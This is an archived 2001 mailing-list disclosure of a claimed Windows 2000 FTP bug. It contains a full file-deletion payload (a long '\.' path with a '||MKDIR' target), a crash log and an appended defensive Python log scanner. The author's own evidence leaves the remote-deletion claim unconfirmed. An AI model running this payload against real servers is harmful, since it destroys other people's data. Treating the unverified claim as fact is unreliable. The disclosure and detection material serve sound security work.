Vulnerability Development mailing list archives

WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system.


From: Antti Hakulinen <thpo () DREAMTHEATER ZZN COM>
Date: Fri, 16 Feb 2001 00:53:46 +0200

This little "MS feature" allows any file on your system to be deleted. This applies at least to Win2k build 2195
Service Pack 1 & latest updates.

Using the GET command like this:
_________________________________________________________________________________________________________
C:\FTP <target machine>
blaah blaah....
(BTW: This "feature" works fine as an anonymous user)
_________________________________________________________________________________________________________
ftp> get \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA||MKDIR c:
\downloads\mp3\1.mp3
---> PORT 212,246,182,42,5,52
200 PORT command successful.
---> RETR \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA||MKDIR
500 Command was too long
____________________________________________________________________________________________________________

So, any file that you named in the ||MKDIR part is deleted. Well, at least it is gone ;)
Malicious users can now delete files, assuming they know where the file is located.
It will be hell easy to put an end to any machine/server that is using MS FTP,
just by deleting all the vital system files. If the file doesn't exist, one will be created, but the length is always 0.
(So no luck with writing a file yet heh)

OHH! Don't get fooled when you do this, umm... for example, to your config.sys file.
There will be an error message: PERMISSION DENIED, but who cares, this fabulous MS feature deletes it anyway. -huh-

Here is the DRWTSN32.LOG file from my system.
-NOTE- The "get" command line was a little different in letters when I tested this "feature" :), but it was equal in
length.



Application exception occurred:
        App: ftp.exe (pid=824)
        When: 2/16/2001 @ 00:04:23.868
        Exception number: c0000005 (access violation)

*----> System Information <----*
        Computer Name: DIVINE
        User Name: Administrator
        Number of Processors: 1
        Processor Type: x86 Family 6 Model 3 Stepping 0
        Windows 2000 Version: 5.0
        Current Build: 2195
        Service Pack: None
        Current Type: Uniprocessor Free
        Registered Organization: xxxxxxxxxxxxxxxx
        Registered Owner: xxxxxxxxxxxxxxxx

*----> Task List <----*
   0 Idle.exe
   8 System.exe
 140 smss.exe
 164 csrss.exe
 160 winlogon.exe
 212 services.exe
 224 lsass.exe
 384 svchost.exe
 412 SPOOLSV.exe
 444 svchost.exe
 484 regsvc.exe
 500 mstask.exe
 556 tcpsvcs.exe
 568 snmp.exe
 616 winmgmt.exe
 648 inetinfo.exe
1080 explorer.exe
1212 internat.exe
 628 msimn.exe
 828 SETI () home exe
 892 cmd.exe
1280 mdm.exe
 824 ftp.exe
1240 drwtsn32.exe
   0 _Total.exe


State Dump for Thread Id 0x324

eax=0006ffb0 ebx=00000000 ecx=00000000 edx=010077c0 esi=00737973 edi=00000001
eip=780121b2 esp=0006f758 ebp=0006f780 iopl=0         nv up ei ng nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000286


function: fclose
        78012192 686af50078       push    0x7800f56a
        78012197 64a100000000     mov     eax,fs:[00000000]      fs:00000000=????????
        7801219d 50               push    eax
        7801219e 64892500000000   mov     fs:[00000000],esp      fs:00000000=????????
        780121a5 83ec0c           sub     esp,0xc
        780121a8 53               push    ebx
        780121a9 56               push    esi
        780121aa 57               push    edi
        780121ab 834de4ff         or   dword ptr [ebp+0xe4],0xff ss:00b3cd56=????????
        780121af 8b7508           mov     esi,[ebp+0x8]          ss:00b3cd56=????????
FAULT ->780121b2 f6460c40         test    byte ptr [esi+0xc],0x40      ds:01204f49=??
        780121b6 7416             jz      wexecve+0x14f (7801a4ce)
        780121b8 83660c00         and    dword ptr [esi+0xc],0x0 ds:01204f49=????????
        780121bc 8b45e4           mov     eax,[ebp+0xe4]         ss:00b3cd56=????????
        780121bf 8b4df0           mov     ecx,[ebp+0xf0]         ss:00b3cd56=????????
        780121c2 64890d00000000   mov     fs:[00000000],ecx      fs:00000000=????????
        780121c9 5f               pop     edi
        780121ca 5e               pop     esi
        780121cb 5b               pop     ebx
        780121cc c9               leave
        780121cd c3               ret
        780121ce 56               push    esi

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0006F780 01001E67 00737973 00000000 010018D3 77E9B3C1 !fclose 
0006FF70 010054EF 00000001 00283724 00282980 77E9B3C1 ftp!<nosymbols> 
0006FFC0 77E87903 77E9B3C1 0012F88F 7FFDF000 C0000005 ftp!<nosymbols> 
0006FFF0 00000000 010053F0 00000000 000000C8 00000100 kernel32!SetUnhandledExceptionFilter 


State Dump for Thread Id 0x4a8

eax=778321fe ebx=00000003 ecx=7ffde000 edx=00000000 esi=77f87e6c edi=00000003
eip=77f87e77 esp=0072fd24 ebp=0072fd70 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246


function: ZwWaitForMultipleObjects
        77f87e6c b8e9000000       mov     eax,0xe9
        77f87e71 8d542404         lea     edx,[esp+0x4]          ss:011fd2fb=????????
        77f87e75 cd2e             int     2e
        77f87e77 c21400           ret     0x14
        77f87e7a 668b08           mov     cx,[eax]                   ds:778321fe=8b55
        77f87e7d 40               inc     eax
        77f87e7e 40               inc     eax
        77f87e7f 8945a4           mov     [ebp+0xa4],eax         ss:011fd346=????????
        77f87e82 6685c9           test    cx,cx
        77f87e85 75f3             jnz   RtlExpandEnvironmentStrings_U+0x26 (77f8e57a)
        77f87e87 663930           cmp     [eax],si                   ds:778321fe=8b55
        77f87e8a 75ee             jnz     ZwFsControlFile+0x54 (77f8bf7a)
        77f87e8c 40               inc     eax
        77f87e8d 40               inc     eax
        77f87e8e 8945a4           mov     [ebp+0xa4],eax         ss:011fd346=????????

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0072FD70 77E9E68A 0072FD48 00000001 00000000 00000000 ntdll!ZwWaitForMultipleObjects 
0072FFB4 77E92CA8 00000004 0007BCDC 7FFDE000 0007C6E8 kernel32!WaitForMultipleObjects 
0072FFEC 00000000 00000000 00000000 00000000 00000000 kernel32!CreateFileA 


___________________________________________________________________________________________________________

Workarounds:
Too tired to search for one right now.
Noticed that RETR???
What's that anyway, so maybe disabling commands.

Otherwise, better not to be using W2K as an FTP server.


P.S: If you can reproduce this, please let me know.

... if you can't let me know also. :)

I'll end my days if this was a known bug, and I haven't just updated my system (which was 2-3 days ago) :)
Anyway, if this is a known bug, let me know please.

Regards: Antti Hakulinen
_____________________________________________________________________________________________________________
              Antti Hakulinen                Antti.Hakulinen () fi flextronics com
              IT Assistant                     Flextronics Design Finland
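A log-side check for the pattern shown in the post, written as an added example (it is not code from the post, from the list, or from Microsoft): it scans FTP control-channel command lines and flags file-access commands whose argument is over-long, contains a run of `\.` self-referencing path components, or embeds a `|` command separator. The thresholds and the sample log lines are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass

# Assumed thresholds for this example, not values taken from the post.
MAX_ARG_LEN = 260        # a legitimate Windows path never exceeds MAX_PATH (260)
DOT_SEGMENT_RUN = 8      # consecutive "\." self-references in one argument
FILE_VERBS = ("RETR", "STOR", "DELE", "MKD", "RMD", "CWD")

# Matches DOT_SEGMENT_RUN or more consecutive "\." components.
DOT_RUN_RE = re.compile(r"(?:\\\.){%d,}" % DOT_SEGMENT_RUN)


@dataclass
class Finding:
    line_no: int
    command: str
    reasons: list


def inspect_argument(arg: str) -> list:
    """Return the reasons a file argument resembles the over-long,
    self-referencing path with an embedded command separator from the post."""
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append(f"argument length {len(arg)} exceeds {MAX_ARG_LEN}")
    if DOT_RUN_RE.search(arg):
        reasons.append("run of '\\.' self-referencing path components")
    if "|" in arg:
        # '|' is not a valid character in a Windows file name at all.
        reasons.append("'|' command separator embedded in a file argument")
    return reasons


def scan_log(lines) -> list:
    """Scan 'VERB argument' control-channel lines; only file verbs are checked."""
    findings = []
    for n, line in enumerate(lines, 1):
        verb, _, arg = line.strip().partition(" ")
        if verb.upper() not in FILE_VERBS:
            continue
        reasons = inspect_argument(arg)
        if reasons:
            findings.append(Finding(n, verb.upper(), reasons))
    return findings


# Constructed sample log: one benign RETR and one shaped like the post's command.
SAMPLE_LOG = [
    "USER anonymous",
    "PORT 10,0,0,5,5,52",
    "RETR readme.txt",
    "RETR " + "\\." * 200 + "A" * 300 + "||MKDIR c:\\data\\x.mp3",
    "CWD pub",
]
```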

